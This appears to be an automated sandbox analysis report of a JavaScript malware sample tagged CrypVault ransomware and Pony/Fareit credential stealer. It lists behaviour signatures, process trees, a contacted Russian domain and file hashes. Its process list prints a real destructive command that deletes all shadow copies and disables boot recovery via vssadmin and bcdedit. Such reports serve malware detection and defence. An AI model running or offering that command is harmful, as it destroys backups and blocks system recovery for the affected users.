Analysis Overview
SHA256
05bbe75c2e13f4e9267f6217a0d91acab003fc7f1eb1a92d81b10bd3cf448f9e
Threat Level: Known bad
The file 1268348828883dbc98a1a584dec8ded8_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
CrypVault
Process spawned unexpected child process
Pony,Fareit
Credentials from Password Stores: Credentials from Web Browsers
Deletes shadow copies
Modifies boot configuration data using bcdedit
Executes dropped EXE
Reads user/profile data of web browsers
Checks computer location settings
Drops startup file
UPX packed file
Loads dropped DLL
Accesses Microsoft Outlook profiles
Accesses Microsoft Outlook accounts
Checks installed software on the system
Suspicious use of SetThreadContext
Drops file in Windows directory
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Suspicious use of AdjustPrivilegeToken
outlook_win_path
Enumerates system info in registry
Interacts with shadow copies
Suspicious use of WriteProcessMemory
Suspicious behavior: AddClipboardFormatListener
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
Uses Volume Shadow Copy service COM API
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-28 09:23
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-28 09:23
Reported
2024-07-30 21:13
Platform
win7-20240708-en
Max time kernel
121s
Max time network
125s
Command Line
Signatures
CrypVault
Pony,Fareit
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\cmd.exe |
Credentials from Password Stores: Credentials from Web Browsers
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VAULT.hta | C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VAULT.hta | C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe | N/A |
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2488 set thread context of 2924 | N/A | C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe | C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe | N/A |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\1268348828883dbc98a1a584dec8ded8_JaffaCakes118.js
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\doc_ed11ce.docx"
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
"C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe"
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\VAULT.hta"
C:\Windows\SysWOW64\wbem\WMIC.exe
"C:\Windows\System32\wbem\WMIC.exe" process call create "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
C:\Windows\system32\cmd.exe
cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | dinom.spb.ru | udp |
| RU | 193.164.150.217:80 | dinom.spb.ru | tcp |
| RU | 193.164.150.217:80 | dinom.spb.ru | tcp |
| RU | 193.164.150.217:80 | dinom.spb.ru | tcp |
| RU | 193.164.150.217:80 | dinom.spb.ru | tcp |
Files
memory/2464-9-0x000000005FFF0000-0x0000000060000000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
| MD5 | 347684b6130a16aace57a364658c8435 |
| SHA1 | 9f6a1ceb820319d56f047b0c1213f7359dc6b7da |
| SHA256 | 4bc47e12fdaadd5d9da37ee13c5c173bf61a013823f5c49065cd5d43f2ddef94 |
| SHA512 | 0596c6f6b80bba6bf4a1874019faf3198a3d9d0dcf1c79bcaa76a5324adf3ee8ce03bc627d77bbe6b565f86caab8ba9df826d894704d13243bfef32005d4f9f7 |
C:\Users\Admin\AppData\Local\Temp\doc_ed11ce.docx
| MD5 | 24a09f3f72fe19cc920e86645626f197 |
| SHA1 | e9cee70b03d0938b8590b01ea89325f65ec90971 |
| SHA256 | 37073e6c5503ebe0b3101f42f98c56892e1db686e5592255faf443ee6066dce6 |
| SHA512 | c59049f19d5eb81283c1848c8145f7a22c1386a40af9d31f3641fecb6d762f75660492f58797514d1053ea87e53635307cdd75366f87ba18f019523967cf27e1 |
memory/2464-10-0x0000000070CAD000-0x0000000070CB8000-memory.dmp
memory/2464-3-0x000000002F301000-0x000000002F302000-memory.dmp
memory/2924-20-0x0000000000300000-0x0000000000400000-memory.dmp
memory/2924-22-0x0000000000400000-0x0000000000E28000-memory.dmp
memory/2924-24-0x0000000000400000-0x0000000000E28000-memory.dmp
memory/2924-27-0x0000000000400000-0x0000000000E28000-memory.dmp
memory/2924-31-0x0000000000400000-0x0000000000E28000-memory.dmp
memory/2924-33-0x0000000000400000-0x0000000000E28000-memory.dmp
memory/2924-32-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2924-36-0x0000000000400000-0x0000000000E28000-memory.dmp
memory/2924-28-0x0000000000400000-0x0000000000E28000-memory.dmp
memory/2924-37-0x0000000000400000-0x0000000000E28000-memory.dmp
memory/2924-38-0x0000000000400000-0x0000000000E28000-memory.dmp
memory/2924-35-0x0000000000400000-0x0000000000E28000-memory.dmp
memory/2924-39-0x00000000001F0000-0x00000000001FF000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\Documents and Settings\Admin\AppData\Local\Temp\~$c_ed11ce.docx
| MD5 | 943297dc7e4e167335e7d7e706bd4ad9 |
| SHA1 | cb3c55a6c4901001c2a2893cc059bf53091b23e8 |
| SHA256 | 19d9f4d720ef5d52383f29ee5edd686f4538757bdb6f8b6aa4c2fa1df32d4763 |
| SHA512 | 66a247f6006117bd01da6d48a2037630ec84da487e2230750e95cb26b241a5c6978553c51dce03ebe8fbc5efef53dd5a354fdb7853e17c05ca3138831509bf42 |
C:\VAULT.KEY
| MD5 | 60d178fed5bfafb342936331a5f836c2 |
| SHA1 | 9b12cb93a5788ba35c2868ce75891e19f7c206ae |
| SHA256 | 1d7c811b33be472b61335979eb1a5137a218e91503b4eb526aadcc0b314b926f |
| SHA512 | ff167015ab2012a37b3672a621a1e031435266210099a6e6018038c9def1fb91d66d16e982c4f502c0609255f9b6d3c1b44f8d9a6343e76908d18eb92520a20b |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VAULT.hta
| MD5 | b71751d104ed8f256ae64a7d02821be0 |
| SHA1 | bc3e6ac19bf1431a5872597684b2982b8ba07d87 |
| SHA256 | 6a37244fbabb6238f178c7b769b3d0f15c93d70fece941b416c8e71140538004 |
| SHA512 | b3bee8dd51f874f5677dbb37989077776d0169d97760395d38ab52ac422ce3a9db78df3970a6c1ac6e18538d8e014fc72f3481964976a5f26b2c7e63efe0ffdf |
C:\VAULT.KEY
| MD5 | f179b38efb131fe9ad676f4b03a18369 |
| SHA1 | 9478bd8fee79cbbb42d935747290d6434a18f221 |
| SHA256 | 72687ac960a85942e32020e051b56a41af1eee24b7a17756b5b0779f8a1d52c3 |
| SHA512 | 9bc73f0688594e74842fc95918a665a0540fd43b3be0d82c8535063282f3bb19e4821cd6d066eaa5d290f9e7ab2cafd42e5f4dd35444d3363ac047d5c61b4a2f |
C:\VAULT.KEY
| MD5 | 755013bef6c797721834f0f336509456 |
| SHA1 | 400180d8f04d8e0bed626603fdc81f4a7c42a11a |
| SHA256 | 7e6770c80322aec1304b0cfe5e81d169a917135d53d365aeeb58c3e0d33df42f |
| SHA512 | 0c80f6def90f22b8994e4d61bdeda365dd6ae0dc070ac26c78f801448949dca032bb9922238c5f886c8728114e8cfc31ec82f5527e9bc5032481d6f9fd32b4d6 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\VAULT.KEY
| MD5 | 8b3c3ed194728acce8a04e8e2bfe62a6 |
| SHA1 | 144a6800357571cc291df1d558a63e88ca236eb5 |
| SHA256 | 87f71a3acf63721b7a0af38e222c755ef18516321adefffdfec570c4bd6b6a96 |
| SHA512 | 77ce72c31eb96ec71f690d5092650e5a2364643b0a9c4cf00ad3ef9df7dd5a52027d6e047f9b020fc4cc6f9d47226c5e87db6ca6474c7066c101da1b04b53a8e |
memory/2924-130-0x0000000000400000-0x0000000000E28000-memory.dmp
C:\VAULT.KEY
| MD5 | 0333f2624bc9830a339c53bfa28845cf |
| SHA1 | b34a59d0c46db3301ebd059e5270f8ec312f0765 |
| SHA256 | 713d5cff0701505aa5affa2c7187cf3bba37c15634ec8fc8238749ff00a853dd |
| SHA512 | 3bb9af97d2840a3d2d34d47bf75645524fd71ba8ba05b42c87bbb4fa9aad00f161794c65ffa5be85489657869b89d18d884d7bcc0f1d9b68427caca4eaf8ef45 |
C:\VAULT.KEY
| MD5 | 5c27ee062378bf4a4f1b963fdc867a3d |
| SHA1 | e8f30952a8a5722f535f657012ff121e1e9730b4 |
| SHA256 | 2dd3a3c1c16ad589270000c7db708e28a7c26279ea847517d91468b7d5911644 |
| SHA512 | cee96add18d9b5137f4d39dfc8c26a1dd6f34780ab8bd63cea510e54878c3f70fc00cd8eb71418634a63fa8e8807e7b1d8d96fd3ac8b4ca3a1d71b1802876ed0 |
memory/2924-182-0x0000000000400000-0x0000000000E28000-memory.dmp
memory/2464-185-0x0000000070CAD000-0x0000000070CB8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | 2aed0ef9b7ca9d7fc3d096320b416b4a |
| SHA1 | eb8383ed2cc3c064efbbc0a935255bbe52346d1b |
| SHA256 | b4a8904d7187bbae04dc592f8f6a197aa3633f1a98e6fcff9ab9f993a94e0635 |
| SHA512 | f3c1a0164b1c5209b673ca6f071dfe589251dc7ccf9f335b64db02bf950c389decba817e934c20ab4c6e821c79ea07ff9205298b9da15c5f253f40cd9477e887 |
memory/2464-202-0x000000005FFF0000-0x0000000060000000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-28 09:23
Reported
2024-07-30 21:10
Platform
win10v2004-20240730-en
Max time kernel
101s
Max time network
128s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-857544305-989156968-2929034274-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Executes dropped EXE
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-857544305-989156968-2929034274-1000_Classes\Local Settings | C:\Windows\system32\wscript.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\1268348828883dbc98a1a584dec8ded8_JaffaCakes118.js
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\doc_ed11ce.docx" /o ""
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
"C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe"
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
C:\Users\Admin\AppData\Local\Temp\2e4cd28716d.exe
